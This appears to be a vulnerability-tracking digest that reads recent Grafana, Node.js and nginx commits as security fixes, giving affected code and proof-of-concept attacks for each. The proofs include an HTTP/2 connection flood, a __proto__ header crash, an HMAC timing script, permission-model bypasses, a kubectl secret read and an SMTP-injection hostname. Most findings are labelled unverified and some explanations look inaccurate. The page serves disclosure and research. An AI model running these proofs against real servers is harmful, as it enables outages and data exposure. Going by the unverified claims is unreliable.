📰 Vulnerability Spoiler Alert


“Exposing patches before CVEs since 2025”

Friday, March 27, 2026

📋 Today’s Briefing

121
Total Findings
11
Confirmed
103
Unverified
7
False Positives
CRITICAL: 2 HIGH: 53 MEDIUM: 56 LOW: 3

🔥 HIGH UNVERIFIED Denial of Service (Resource Exhaustion)

Mar 27, 2026, 02:37 PM — grafana/grafana

Commit: 449a8a9

Author: Kevin Minehart Tenorio

The fill resampling feature in Grafana's SQL datasources (MySQL, PostgreSQL, MSSQL) could be exploited to cause excessive memory allocation. By crafting a query with a very large time range and a very small fill interval (e.g., time range spanning years with millisecond intervals), an attacker could trigger `sqlutil.ResampleWideFrame` to allocate an enormous number of data points, exhausting server memory and causing a denial of service. The patch adds a guard that skips the fill operation if the number of fill points would exceed the configured row limit.

🔍 View Affected Code & PoC

Affected Code

frame, err = sqlutil.ResampleWideFrame(frame, qm.FillMissing, alignedTimeRange, qm.Interval)
if err != nil {
    logger.Error("Failed to resample dataframe", "err", err)
    frame.AppendNotices(data.Notice{Text: "Failed to resample dataframe", Severity: data.NoticeSeverityWarning})
}

Proof of Concept

Send a Grafana dashboard query to a PostgreSQL/MySQL/MSSQL datasource with: timeRange.From = '2000-01-01T00:00:00Z', timeRange.To = '2030-01-01T00:00:00Z' (30-year range), fill interval = '1ms' (1 millisecond). The macro $__timeGroup(time_column, '1ms', 0) enables fill mode with a 1ms interval. numFillPoints = 30years / 1ms ≈ 9.46e11 points. ResampleWideFrame would attempt to allocate ~9.46 trillion data points, consuming terabytes of memory and crashing the Grafana server.

🔥 HIGH UNVERIFIED Sensitive Data Exposure

Mar 27, 2026, 08:15 AM — grafana/grafana

Commit: c23a34a

Author: Ryan McKinley

When a user creates a Kubernetes resource containing inline secure values (raw secrets) via kubectl apply, the kubectl client automatically stores the full object including the raw secret value in the `kubectl.kubernetes.io/last-applied-configuration` annotation. This annotation is persisted in the API server and can be read back by anyone with read access to the resource, effectively leaking the raw secret value. The patch clears this annotation when a raw secret is detected in the inline secure values section, preventing the secret from being stored in plaintext in the annotation.

🔍 View Affected Code & PoC

Affected Code

n, err := store.CreateInline(ctx, v.ref, val.Create, val.Description)
if err != nil {
    return err
}
v.createdSecureValues = append(v.createdSecureValues, n)
v.hasChanged = true
secure[k] = common.InlineSecureValue{Name: n}
continue

Proof of Concept

1. User runs: kubectl apply -f datasource.yaml where datasource.yaml contains a secure value like {"secure": {"password": {"create": "SuperSecretPassword123"}}}
2. kubectl automatically adds annotation: kubectl.kubernetes.io/last-applied-configuration={..."secure":{"password":{"create":"SuperSecretPassword123"}}...}
3. Any user with read access to the resource can retrieve the raw secret: kubectl get datasource myds -o jsonpath='{.metadata.annotations.kubectl\.kubernetes\.io/last-applied-configuration}'
4. The raw secret value 'SuperSecretPassword123' is returned in plaintext, bypassing the entire secure value protection mechanism.

🔥 HIGH UNVERIFIED Use-After-Free

Mar 26, 2026, 10:18 PM — nodejs/node

Commit: 53bcd11

Author: Matteo Collina

The Reset() method in Node.js's zlib binding did not check the write_in_progress_ flag before resetting the compression stream. This allowed calling reset() while an async write was being processed by a worker thread, causing the internal zlib/brotli state to be freed while still in use, resulting in a use-after-free condition that could lead to memory corruption or process crash. The fix adds a guard that throws an error if a write is in progress, consistent with how Close() and Write() already behave.

🔍 View Affected Code & PoC

Affected Code

AllocScope alloc_scope(wrap);
const CompressionError err = wrap->context()->ResetStream();
if (err.IsError())

Proof of Concept

const { createDeflate } = require('zlib');
const stream = createDeflate();
const input = Buffer.alloc(1024 * 1024, 0x41); // large buffer to ensure async
stream.write(input);
// Immediately reset while write is in progress in thread pool:
stream._handle.reset(); // triggers use-after-free in worker thread

⚠️ MEDIUM UNVERIFIED Broken Access Control / Authorization Bypass

Mar 26, 2026, 08:40 AM — grafana/grafana

Commit: bafbc26

Author: Gabriel MABILLE

Before this patch, the Kubernetes-style IAM API endpoint `/apis/iam.grafana.app/v0alpha1/namespaces/{ns}/users/{name}/teams` used the generic `ResourceAuthorizer` which only checked `get` permission on the `users` resource itself, but did not properly enforce the `teams` subresource authorization. According to the commit, the RBAC service would ignore the 'teams' subresource check, meaning any user with generic `users:read` permission could potentially access team membership data for users they shouldn't be able to see. The patch adds a dedicated `UserAuthorizer` that explicitly checks `get` permission on the parent user when the `teams` subresource is requested.

🔍 View Affected Code & PoC

Affected Code

resourceAuthorizer[iamv0.UserResourceInfo.GetName()] = authorizer

Proof of Concept

An authenticated user with `users:read` permission scoped to a subset of users (e.g., only their own user) could send: GET /apis/iam.grafana.app/v0alpha1/namespaces/org-1/users/another-user-id/teams - Before the patch, the ResourceAuthorizer would check permission on the `users` resource without properly handling the `teams` subresource distinction, potentially allowing access to team memberships of users outside the caller's permission scope. After the patch, a proper `get` check on the specific parent user is enforced before granting access to their teams.

⚠️ MEDIUM UNVERIFIED Broken Access Control / Information Disclosure

Mar 25, 2026, 03:52 PM — grafana/grafana

Commit: c30a9e2

Author: Yuri Tseretyan

The `/api/alertmanager/grafana/api/v2/status` endpoint was protected by the `alert.notifications:read` permission, which is granted to Viewers and Editors by default. This allowed any authenticated user (including low-privileged Viewers) to access Alertmanager system status information including routing configuration, receivers configuration, and other sensitive system details. The patch replaces this with a new dedicated `alert.notifications.system-status:read` permission that is only granted to Admin users.

🔍 View Affected Code & PoC

Affected Code

case http.MethodGet + "/api/alertmanager/grafana/api/v2/status":
	eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)

Proof of Concept

curl -u viewer:viewer http://<grafana-host>/api/alertmanager/grafana/api/v2/status
# Before the patch, this returns HTTP 200 with full Alertmanager status including routing configuration and receiver details
# After the patch, returns HTTP 403 Forbidden for Viewer/Editor users

⚠️ MEDIUM UNVERIFIED Authorization Bypass / Improper Access Control

Mar 25, 2026, 02:31 PM — grafana/grafana

Commit: 2895856

Author: Gonzalo Trigueros Manzanas

Before the patch, the `validateWriteAccess` function did not handle `JobActionFixFolderMetadata` in its switch statement, meaning it fell through to the `default` case which applies no ref-based restriction. This allowed users to trigger a fix-folder-metadata job that would write directly to the default/main branch even when the repository was configured with only a 'branch' workflow (meaning the default branch should be read-only). The patch adds the missing case to extract the target ref from `FixFolderMetadata.Ref` and apply proper write permission checks.

🔍 View Affected Code & PoC

Affected Code

case provisioning.JobActionPush:
    if spec.Push != nil {
        targetRef = spec.Push.Branch
    }
// Missing case for JobActionFixFolderMetadata - falls through to default
case provisioning.JobActionMigrate:

Proof of Concept

POST /apis/provisioning.grafana.app/v0alpha1/namespaces/default/repositories/my-read-only-repo/jobs
Content-Type: application/json

{"action": "fix-folder-metadata"}

This request would bypass the branch-workflow restriction and push _folder.json files directly to the protected main branch, even though the repo is configured with only the 'branch' workflow (no direct writes to default branch allowed).

🔥 HIGH UNVERIFIED Permission Model Bypass

Jan 5, 2026, 09:18 PM — nodejs/node

Commit: e4f3c20

Author: RafaelGSS

The Node.js Permission Model's `--allow-fs-read` restriction could be bypassed by using `fs.realpath.native()` instead of `fs.realpath()`. Before the patch, `RealPath` in node_file.cc lacked permission checks for both the async and sync code paths, allowing an attacker to read/resolve file paths that should be blocked by the permission model. The patch adds `ASYNC_THROW_IF_INSUFFICIENT_PERMISSIONS` and `THROW_IF_INSUFFICIENT_PERMISSIONS` checks to enforce the `kFileSystemRead` permission scope.

🔍 View Affected Code & PoC

Affected Code

if (argc > 2) {  // realpath(path, encoding, req)
    FSReqBase* req_wrap_async = GetReqWrap(args, 2);
    CHECK_NOT_NULL(req_wrap_async);
    FS_ASYNC_TRACE_BEGIN1(
        UV_FS_REALPATH, req_wrap_async, "path", TRACE_STR_COPY(*path))

Proof of Concept

// Run Node.js with permission model restricting /etc/passwd:
// node --experimental-permission --allow-fs-read=/tmp script.js
// script.js:
const fs = require('fs');
// fs.readFile('/etc/passwd', ...) would throw ERR_ACCESS_DENIED
// But before patch, this would succeed and resolve the real path:
fs.realpath.native('/etc/passwd', (err, resolvedPath) => {
  console.log('Bypassed permission model, resolved path:', resolvedPath);
});

🔥 HIGH UNVERIFIED Permission Model Bypass

Jan 5, 2026, 11:36 PM — nodejs/node

Commit: 3a04e0f

Author: RafaelGSS

The Node.js Permission Model (introduced with --experimental-permission flag) did not enforce filesystem read/write permission checks on several `fs/promises` API functions including `lstat`, `fchmod`, and `fchown`. This allowed an attacker to bypass the permission model by using the promise-based filesystem API instead of the callback/sync APIs, which did have proper permission checks. The patch adds the missing permission checks to `lstat` (read permission) and disables `fchmod`/`fchown` entirely when the Permission Model is enabled.

🔍 View Affected Code & PoC

Affected Code

async function lstat(path, options = { bigint: false }) {
  const result = await PromisePrototypeThen(
    binding.lstat(getValidatedPath(path), options.bigint, kUsePromises),
    undefined,
    handleErrorFromBinding,
  );

Proof of Concept

// Run Node.js with Permission Model enabled, blocking access to /etc/passwd:
// node --experimental-permission --allow-fs-read=/tmp test.js

const { lstat } = require('node:fs/promises');

// Before patch: this succeeds and reveals file metadata despite being blocked
// After patch: throws ERR_ACCESS_DENIED
async function exploit() {
  try {
    const stats = await lstat('/etc/passwd');
    console.log('BYPASS SUCCESS - got stats:', stats); // succeeds before patch
  } catch (e) {
    console.log('Blocked:', e.code);
  }
}
exploit();

// Similarly for fchmod to change file permissions on a blocked file:
// const fh = await open('/etc/somefile', 'r'); // if read is allowed
// await fh.chmod(0o777); // Before patch: succeeds, bypassing write permission check

🔥 HIGH UNVERIFIED Denial of Service (Crash/Abort)

Feb 10, 2026, 01:23 PM — nodejs/node

Commit: dabb2f5

Author: RafaelGSS

Before the patch, `url.format()` called `CHECK(out)` after attempting to re-parse a URL string with `ada::parse&lt;ada::url&gt;`. If the URL (originally parsed by `ada::url_aggregator`) could not be re-parsed by `ada::url` (e.g., special scheme URLs with opaque paths like `ws:xn-ȫ`), the CHECK macro would trigger an abort/crash of the Node.js process. The patch replaces the hard crash with a graceful fallback that returns the original href unmodified.

🔍 View Affected Code & PoC

Affected Code

auto out = ada::parse<ada::url>(href.ToStringView());
CHECK(out);

Proof of Concept

// Run in Node.js - crashes the process before the patch
const url = require('node:url');
const u = new URL('ws:xn-\u022B');
url.format(u, { fragment: false, unicode: false, auth: false, search: false });
// Before patch: process aborts with CHECK failure
// After patch: returns the original href string without crashing

🔥 HIGH UNVERIFIED Uncaught Exception / Denial of Service

Feb 17, 2026, 01:26 PM — nodejs/node

Commit: 2e2abc6

Author: Matteo Collina

Before the patch, if an SNICallback function threw a synchronous exception during TLS handshake processing in loadSNI(), the exception would propagate as an uncaught exception, crashing the Node.js process. The patch wraps the owner._SNICallback() invocation in a try/catch block, routing any thrown exceptions through owner.destroy() instead. A remote unauthenticated attacker can crash any Node.js TLS server by sending a TLS ClientHello with a crafted server_name value that causes the SNICallback to throw.

🔍 View Affected Code & PoC

Affected Code

owner._SNICallback(servername, (err, context) => {
    if (once)
      return owner.destroy(new ERR_MULTIPLE_CALLBACK());
    once = true;
    if (err)
      return owner.destroy(err);

Proof of Concept

// Attacker code: connect to a Node.js TLS server with a crafted servername
// Server setup (victim):
const tls = require('tls');
const server = tls.createServer({
  key: fs.readFileSync('server-key.pem'),
  cert: fs.readFileSync('server-cert.pem'),
  SNICallback: (servername, cb) => {
    // Any throw here crashes the server process before the patch
    if (!knownHosts[servername]) throw new Error('Unknown host');
    cb(null, getContext(servername));
  }
});
server.listen(443);

// Attacker: send TLS ClientHello with servername='evil.attacker.com'
// This triggers SNICallback to throw, causing uncaught exception and process crash
const client = tls.connect({ host: 'victim.com', port: 443, servername: 'evil.attacker.com', rejectUnauthorized: false });
client.on('error', () => {});
// Result: Server process crashes with uncaught Error: Unknown host

⚠️ MEDIUM UNVERIFIED Permission Model Bypass

Feb 18, 2026, 04:37 PM — nodejs/node

Commit: 59c86b1

Author: RafaelGSS

Node.js's permission model (--permission flag) failed to enforce network access controls for Unix Domain Socket (UDS) connections and server listeners via pipe_wrap.cc. Before the patch, calling net.createServer().listen('/tmp/sock') or net.connect({path:'/tmp/sock'}) would succeed even when --allow-net was not granted, bypassing the intended permission restrictions. The patch adds THROW_IF_INSUFFICIENT_PERMISSIONS checks to PipeWrap::Bind and PipeWrap::Listen to enforce the kNet permission scope.

🔍 View Affected Code & PoC

Affected Code

void PipeWrap::Bind(const FunctionCallbackInfo<Value>& args) {
  PipeWrap* wrap;
  ASSIGN_OR_RETURN_UNWRAP(&wrap, args.This());
  node::Utf8Value name(args.GetIsolate(), args[0]);
  int err =
      uv_pipe_bind2(&wrap->handle_, *name, name.length(), UV_PIPE_NO_TRUNCATE);

Proof of Concept

// Run with: node --permission --allow-fs-read=* exploit.js
// Before patch: server binds successfully despite no --allow-net
const net = require('net');
net.createServer().listen('/tmp/bypass.sock', () => {
  console.log('Permission bypass! Server listening on UDS without --allow-net');
});
// Expected after patch: throws ERR_ACCESS_DENIED with permission: 'Net'

🔥 HIGH UNVERIFIED Denial of Service via Prototype Pollution

Feb 19, 2026, 02:49 PM — nodejs/node

Commit: ef5929b

Author: Matteo Collina

When `headersDistinct` or `trailersDistinct` was accessed on an IncomingMessage, the destination object was initialized as a plain `{}` which inherits from `Object.prototype`. If a request included a `__proto__` header, `dst\["__proto__"\]` would resolve to `Object.prototype` (a truthy object rather than undefined), causing `_addHeaderLineDistinct` to call `.push()` on `Object.prototype` instead of an array, throwing an uncaught TypeError that crashes the Node.js process. The fix uses `{ __proto__: null }` to create a null-prototype object, preventing prototype chain lookups.

🔍 View Affected Code & PoC

Affected Code

if (!this[kHeadersDistinct]) {
  this[kHeadersDistinct] = {};

  const src = this.rawHeaders;
  const dst = this[kHeadersDistinct];

Proof of Concept

Send the following raw HTTP request to any Node.js HTTP server that accesses req.headersDistinct:

`​`​`​
GET / HTTP/1.1\r\n
Host: localhost\r\n
__proto__: test\r\n
Connection: close\r\n
\r\n
`​`​`​

Or programmatically:
`​`​`​javascript
const net = require('net');
const client = net.connect(PORT, () => {
  client.write('GET / HTTP/1.1\r\nHost: localhost\r\n__proto__: test\r\nConnection: close\r\n\r\n');
});
// Server crashes with: TypeError: dest[key].push is not a function
// because dest["__proto__"] resolves to Object.prototype (truthy),
// so push() is called on Object.prototype instead of an array.
`​`​`​

⚠️ MEDIUM UNVERIFIED Timing Side-Channel Attack (HMAC/KMAC Verification)

Feb 20, 2026, 11:32 AM — nodejs/node

Commit: b36d5a3

Author: Filip Skokan

The Web Cryptography API's HMAC and KMAC `verify` operations used the non-constant-time `memcmp` function to compare the computed MAC against the provided signature. This allowed timing-based side-channel attacks where an attacker could measure response times to infer byte-by-byte information about the expected MAC value. The patch replaces `memcmp` with `CRYPTO_memcmp`, which executes in constant time regardless of where the comparison fails.

🔍 View Affected Code & PoC

Affected Code

out->size() > 0 && out->size() == params.signature.size() &&
    memcmp(out->data(), params.signature.data(), out->size()) == 0

Proof of Concept

// Exploit: Timing attack against SubtleCrypto.verify() for HMAC
// An attacker who can make many verify calls and measure timing can recover the HMAC value

async function timingAttack() {
  const key = await crypto.subtle.importKey(
    'raw', new TextEncoder().encode('secret-key'),
    { name: 'HMAC', hash: 'SHA-256' }, false, ['sign', 'verify']
  );
  const data = new TextEncoder().encode('message');
  // Attacker tries forged signatures byte by byte
  // memcmp returns early on first differing byte, leaking timing info
  // A signature where first byte matches will take slightly longer than one where first byte differs
  const forgedSig = new Uint8Array(32); // all zeros
  const ITERATIONS = 100000;
  const start = performance.now();
  for (let i = 0; i < ITERATIONS; i++) {
    await crypto.subtle.verify('HMAC', key, forgedSig, data);
  }
  const elapsed = performance.now() - start;
  // By varying forgedSig[0] from 0-255 and measuring timing, attacker
  // can determine correct first byte (takes measurably longer when correct)
  // Repeat for each subsequent byte to recover full HMAC
  console.log('Timing:', elapsed);
}

🔥 HIGH UNVERIFIED Memory Leak / Resource Exhaustion (DoS)

Mar 11, 2026, 02:22 PM — nodejs/node

Commit: 8261536

Author: RafaelGSS

A malicious HTTP/2 client could send a WINDOW_UPDATE frame on stream 0 (connection level) with an increment that pushes the flow-control window past 2^31-1. nghttp2 internally responds with GOAWAY(FLOW_CONTROL_ERROR) but Node.js's OnInvalidFrame callback did not handle NGHTTP2_ERR_FLOW_CONTROL, so the Http2Session was never destroyed, causing a memory leak. An attacker can exploit this to exhaust server memory by repeatedly opening connections and sending the malicious frame, enabling denial of service.

🔍 View Affected Code & PoC

Affected Code

if (nghttp2_is_fatal(lib_error_code) ||
      lib_error_code == NGHTTP2_ERR_STREAM_CLOSED ||
      lib_error_code == NGHTTP2_ERR_PROTO) {

Proof of Concept

// Connect via raw TCP to a Node.js HTTP/2 server and send:
// 1. HTTP/2 client preface: 'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
// 2. Empty SETTINGS frame
// 3. After receiving server SETTINGS, send SETTINGS ACK
// 4. Send WINDOW_UPDATE on stream 0 with increment 0x7FFFFFFF (2^31-1)
//    Default window is 65535, so 65535+2147483647 > 2^31-1 triggers NGHTTP2_ERR_FLOW_CONTROL
// The server sends GOAWAY but the Http2Session is never destroyed -> memory leak
// Repeat thousands of times to exhaust server memory.

const net = require('net');
for (let i = 0; i < 10000; i++) {
  const conn = net.connect({ port: 8443 });
  conn.write('PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n');
  const settings = Buffer.alloc(9); settings[3] = 0x04; conn.write(settings);
  setTimeout(() => {
    const ack = Buffer.alloc(9); ack[3] = 0x04; ack[4] = 0x01; conn.write(ack);
    const wu = Buffer.alloc(13);
    wu.writeUIntBE(4,0,3); wu[3]=0x08; wu[4]=0x00;
    wu.writeUIntBE(0,5,4); wu.writeUIntBE(0x7FFFFFFF,9,4);
    conn.write(wu);
  }, 100);
}

🔥 HIGH UNVERIFIED Hash Collision / Denial of Service

Jan 29, 2026, 02:30 AM — nodejs/node

Commit: 0d7e4b1

Author: Joyee Cheung

V8's array index hash values for numeric strings were predictable because they directly encoded the integer value and string length without randomization. Consecutive numeric string keys (e.g., '0', '1', '2', ...) would have consecutive hash values, allowing an attacker to craft inputs that cause O(n^2) hash table probe collisions. This patch adds seeded scrambling of the 24-bit array-index value in Name's raw_hash_field using a 3-round xorshift-multiply scheme with random secrets derived from rapidhash, preventing an attacker from predicting hash distributions. This is tracked as CVE-2026-21717.

🔍 View Affected Code & PoC

Affected Code

// Previously, array index hashes were simply:
// MakeArrayIndexHash(value, length) encodes value directly
// Name::ArrayIndexValueBits::decode(raw_hash_field_) to recover
// Consecutive keys '0','1','2'... had consecutive, predictable hash values

Proof of Concept

// Node.js DoS via hash collision attack
const obj = {};
const N = 100000;
const start = Date.now();
// Insert consecutive numeric string keys - before the patch, these have
// consecutive hash values causing O(n^2) worst-case probing behavior
for (let i = 0; i < N; i++) {
  obj[String(i)] = i;
}
console.log('Time:', Date.now() - start, 'ms');
// An attacker serving a JSON payload with sequential numeric keys to a
// Node.js server causes excessive CPU usage. With predictable hashes,
// crafted inputs can force worst-case hash table behavior, leading to DoS.

🔥 HIGH UNVERIFIED Multiple: Timing Attack, Prototype Pollution, Permission Bypass, DoS, TLS Error Handling

Mar 19, 2026, 12:29 PM — nodejs/node

Commit: 7be0e28

Author: Marco Ippolito

This commit patches multiple security vulnerabilities in Node.js 20.x LTS including: (1) CVE-2026-21713: timing-unsafe HMAC comparison in Web Crypto allowing key extraction via timing oracle; (2) CVE-2026-21710: missing null prototype for HTTP headers objects enabling prototype pollution; (3) CVE-2026-21716/21715: missing permission checks in fs.promises and realpath.native bypassing Node.js permission model; (4) CVE-2026-21714: unhandled NGHTTP2_ERR_FLOW_CONTROL causing HTTP/2 DoS; (5) CVE-2026-21637: uncaught SNICallback exception crashing TLS server.

🔍 View Affected Code & PoC

Affected Code

// CVE-2026-21710: HTTP headers without null prototype
this.headersDistinct = {}; // vulnerable to __proto__ pollution
this.trailersDistinct = {};

// CVE-2026-21713: Non-timing-safe HMAC comparison
return mac === signature; // allows timing oracle attack

Proof of Concept

// CVE-2026-21710 Prototype Pollution via HTTP headers:
const http = require('http');
http.get('http://victim/', (res) => {
  // Before patch, headersDistinct used regular {} allowing:
  // __proto__ key in response headers to pollute Object.prototype
});

// CVE-2026-21637 TLS Server Crash:
const tls = require('tls');
const server = tls.createServer({
  SNICallback: (servername, cb) => { throw new Error('crash'); }
});
// Before patch, uncaught exception from SNICallback crashes entire server process

// CVE-2026-21713 Timing attack on HMAC:
// Attacker can measure response time differences to brute-force HMAC signatures
// by exploiting non-constant-time string comparison in Web Crypto HMAC verify

🔥 HIGH UNVERIFIED Multiple: Prototype Pollution, Timing Side-Channel, DoS, Permission Bypass, Hash Collision

Mar 22, 2026, 04:06 PM — nodejs/node

Commit: d2be89c

Author: Antoine du Hamel

This commit patches multiple CVEs in Node.js 22 LTS. The highest severity issues include CVE-2026-21710 (prototype pollution via HTTP headers using null prototype for headersDistinct/trailersDistinct) and CVE-2026-21637 (uncaught exception DoS via SNICallback). The patch also fixes a timing side-channel in HMAC comparison (CVE-2026-21713), permission bypass in fs.promises and realpath.native (CVE-2026-21715/16), HTTP/2 flow control error handling (CVE-2026-21714), and a V8 array index hash collision (CVE-2026-21717).

🔍 View Affected Code & PoC

Affected Code

// HTTP headers object used regular Object prototype, allowing prototype pollution:
// headersDistinct/trailersDistinct were created as plain objects {}
// allowing '__proto__', 'constructor', 'toString' as header names to pollute Object.prototype

Proof of Concept

// CVE-2026-21710: Prototype Pollution via HTTP headers
const http = require('http');
const req = http.request({host:'example.com'}, (res) => {
  // Before patch: res.headersDistinct used Object with prototype
  // Sending header '__proto__' would pollute Object.prototype
  console.log(res.headersDistinct['__proto__']); // could access prototype chain
});
req.setHeader('__proto__', 'polluted');

// CVE-2026-21637: SNICallback exception causes server crash
const tls = require('tls');
const server = tls.createServer({
  SNICallback: (servername, cb) => { throw new Error('crash'); }
});
// Before patch: uncaught exception in SNICallback would crash the Node.js process

🔥 HIGH UNVERIFIED Prototype Pollution

Mar 16, 2026, 05:02 PM — nodejs/node

Commit: 141d9f1

Author: Juan José Arboleda

The HTTP module used regular objects for headersDistinct and trailersDistinct, which are populated with header names as keys. An attacker could send HTTP headers with names like '__proto__', 'constructor', or 'toString' to pollute the Object prototype, potentially affecting all objects in the Node.js process. The fix uses null-prototype objects (Object.create(null)) to prevent prototype chain pollution.

🔍 View Affected Code & PoC

Affected Code

headersDistinct[key] = [value]; // key could be '__proto__' or 'constructor'
trailersDistinct[key] = [value]; // using regular object allows prototype pollution

Proof of Concept

// Send HTTP request with prototype-polluting header name:
const http = require('http');
const req = http.request({host:'target.com', path:'/', method:'GET'}, (res) => {
  console.log(res.headersDistinct['__proto__']); // triggers prototype pollution
});
req.setHeader('__proto__', '{"polluted":true}');
req.end();
// After processing, check: console.log({}.polluted) // => true (before patch)

🔥 HIGH UNVERIFIED Prototype Pollution

Mar 20, 2026, 05:29 PM — nodejs/node

Commit: d88a46a

Author: RafaelGSS

The HTTP module used regular objects (with Object.prototype) for headersDistinct and trailersDistinct, which could allow an attacker to pollute the prototype chain by sending HTTP headers with names like '__proto__' or 'constructor'. The fix uses null-prototype objects (Object.create(null)) to prevent prototype pollution attacks. This could lead to security bypasses or unexpected behavior in applications that rely on HTTP header processing.

🔍 View Affected Code & PoC

Affected Code

headersDistinct: {}, // or similar object literal without null prototype
trailersDistinct: {} // inherits from Object.prototype

Proof of Concept

// Send an HTTP request with a header named '__proto__' or 'constructor':
// curl -H '__proto__: {"polluted":true}' http://target-server/
// Or in Node.js:
const http = require('http');
const req = http.request({host:'localhost', port:3000, headers: {'__proto__': 'polluted'}});
// Before patch: headersDistinct['__proto__'] assignment could pollute Object.prototype
// After parsing headers, Object.prototype.polluted could be set to unexpected values
// affecting all objects in the process

🔥 HIGH UNVERIFIED Authentication Bypass

Mar 17, 2026, 03:20 PM — nginx/nginx

Commit: 18711f7

Author: Sergey Kandaurov

In the nginx stream SSL module, the OCSP (Online Certificate Status Protocol) certificate revocation check was not being performed during client certificate validation. The code would verify the certificate chain but skip the OCSP status check, allowing clients with revoked certificates to successfully authenticate. The patch adds the missing `ngx_ssl_ocsp_get_status()` call that properly checks and enforces OCSP certificate revocation status.

🔍 View Affected Code & PoC

Affected Code

X509_free(cert);
        }
    }

    return NGX_OK;

Proof of Concept

1. Configure nginx stream with ssl_verify_client on and ssl_ocsp on
2. Obtain a valid client certificate from a CA that supports OCSP
3. Have the CA revoke the certificate (OCSP status becomes 'revoked')
4. Connect to nginx stream using the revoked certificate:
   openssl s_client -connect nginx-server:port -cert revoked-client.crt -key client.key
5. BEFORE patch: Connection succeeds despite revoked certificate (OCSP check was skipped)
6. AFTER patch: Connection is rejected with 'client SSL certificate verify error'

🔥 HIGH UNVERIFIED Integer Overflow leading to Out-of-Bounds Read/Write

Mar 2, 2026, 05:12 PM — nginx/nginx

Commit: 3568812

Author: Roman Arutyunyan

On 32-bit platforms, multiplying a uint32_t `entries` value by the size of a struct (also size_t/32-bit) could overflow before being compared to the uint64_t `atom_data_size`. This allowed an attacker to craft a malicious MP4 file with a large entries count that, after overflow, appeared to pass the size validation check, causing nginx to process entries beyond the allocated buffer boundaries with out-of-bounds reads and writes. The fix casts `entries` to uint64_t before multiplication to prevent the overflow.

🔍 View Affected Code & PoC

Affected Code

if (ngx_mp4_atom_data_size(ngx_mp4_stts_atom_t)
        + entries * sizeof(ngx_mp4_stts_entry_t) > atom_data_size)

Proof of Concept

Craft a malicious MP4 file where an stts atom has entries=0x20000000 (536870912) and atom_data_size=0x100 (small). On a 32-bit platform: entries * sizeof(ngx_mp4_stts_entry_t) = 0x20000000 * 8 = 0x100000000 which overflows to 0x00000000. Adding ngx_mp4_atom_data_size (e.g., 12) gives 12, which is less than atom_data_size=0x100, so validation passes. Nginx then processes 536 million non-existent entries beyond the allocated buffer, causing heap out-of-bounds access. Serve this file via nginx's mp4 module: GET /malicious.mp4?start=0

🔥 HIGH UNVERIFIED Heap Buffer Overflow

Mar 16, 2026, 04:13 PM — nginx/nginx

Commit: 9739e75

Author: Roman Arutyunyan

When nginx WebDAV module (ngx_http_dav_module) processed COPY or MOVE requests with an alias directive configured, supplying a Destination header with a URI shorter than the alias prefix caused an integer underflow in ngx_http_map_uri_to_path(). The underflow resulted in a heap buffer overwrite, which could allow an attacker to manipulate source or destination file paths to be outside the configured location root (path traversal via memory corruption). The patch adds a validation check that rejects Destination URIs shorter than the alias length before the vulnerable path mapping occurs.

🔍 View Affected Code & PoC

Affected Code

/* In ngx_http_dav_copy_move_handler(), before calling ngx_http_map_uri_to_path()
   with duri (destination URI), there was no check that duri.len >= clcf->alias.
   When alias is set and duri.len < clcf->alias, the subtraction
   (duri.len - clcf->alias) underflows as a size_t (unsigned), producing a
   huge length value passed to ngx_http_map_uri_to_path(). */

Proof of Concept

nginx.conf:
  location /files/ {
    alias /var/www/data/;
    dav_methods COPY MOVE;
  }

Exploit request:
  COPY /files/a.txt HTTP/1.1
  Host: victim.example.com
  Destination: http://victim.example.com/x
  Depth: 0

Here the Destination URI path '/x' has length 2, which is less than the alias
prefix length for '/files/' (7). This triggers the integer underflow in
ngx_http_map_uri_to_path() when computing the path length, resulting in a heap
buffer overwrite that can change the resolved destination path to be outside
/var/www/data/, potentially writing to arbitrary filesystem locations.

🔥 HIGH UNVERIFIED Header Injection / SMTP Injection

Feb 26, 2026, 07:52 AM — nginx/nginx

Commit: 6f31450

Author: Roman Arutyunyan

Before the patch, when nginx's mail module resolved a client's IP address to a hostname, it used the resolved hostname without validation in auth_http requests and SMTP proxy communications. An attacker controlling DNS responses could return a hostname containing newlines, spaces, or other special characters, enabling injection of arbitrary headers into auth_http requests or arbitrary SMTP commands into the proxied SMTP session. The patch validates that the resolved hostname only contains RFC 1034-compliant characters (letters, digits, hyphens, dots).

🔍 View Affected Code & PoC

Affected Code

s->host.data = ngx_pstrdup(c->pool, &ctx->name);
// ctx->name is used directly without validation after reverse DNS resolution

Proof of Concept

An attacker controls DNS for their IP (e.g., 1.2.3.4). They configure the PTR record to return: 'evil.com\r\nX-Injected-Header: malicious' or 'evil.com\r\nMAIL FROM:<[email protected]>\r\nRCPT TO:<[email protected]>'. When nginx resolves the client IP and gets this crafted hostname, it is used verbatim in auth_http HTTP request headers (e.g., as Client-Host) or in SMTP proxy greeting, allowing HTTP header injection or SMTP command injection.

⚠️ MEDIUM UNVERIFIED Null Pointer Dereference

Mar 18, 2026, 12:39 PM — nginx/nginx

Commit: 9bc1371

Author: Sergey Kandaurov

When authenticating with CRAM-MD5 or APOP methods, the code set `s-&gt;passwd.data = NULL` but did not reset `s-&gt;passwd.len`. On a subsequent authentication attempt, the non-zero length would cause the code to attempt to use the null pointer as if it pointed to valid password data, resulting in a null pointer dereference and worker process crash. The fix uses `ngx_str_null(&s-&gt;passwd)` which correctly zeroes both the data pointer and the length.

🔍 View Affected Code & PoC

Affected Code

s->passwd.data = NULL;

Proof of Concept

1. Configure nginx mail proxy with CRAM-MD5 auth method and auth_http backend.
2. Connect to the mail service and authenticate using CRAM-MD5 (first attempt succeeds or fails normally).
3. On the same connection or a new connection handled by the same worker, attempt a second CRAM-MD5 authentication.
4. The worker process crashes with a null pointer dereference because s->passwd.len is non-zero but s->passwd.data is NULL, causing nginx to attempt to read from address 0x0 when constructing the next auth HTTP request.

🔥 HIGH UNVERIFIED Buffer Overread/Overwrite

Feb 21, 2026, 08:04 AM — nginx/nginx

Commit: 7725c37

Author: Roman Arutyunyan

The nginx mp4 module had off-by-one errors in bounds checking for stco and co64 atoms. When `trak-&gt;start_chunk` equaled `trak-&gt;chunks` (i.e., pointing exactly past the end of the chunks array), the old check `trak-&gt;start_chunk &gt; trak-&gt;chunks` would pass, allowing out-of-bounds memory access. Similarly, empty stsz sample arrays could be processed leading to buffer overread/overwrite. The patch changes `&gt;` to `&gt;=` to properly reject these boundary cases.

🔍 View Affected Code & PoC

Affected Code

if (trak->start_chunk > trak->chunks) {
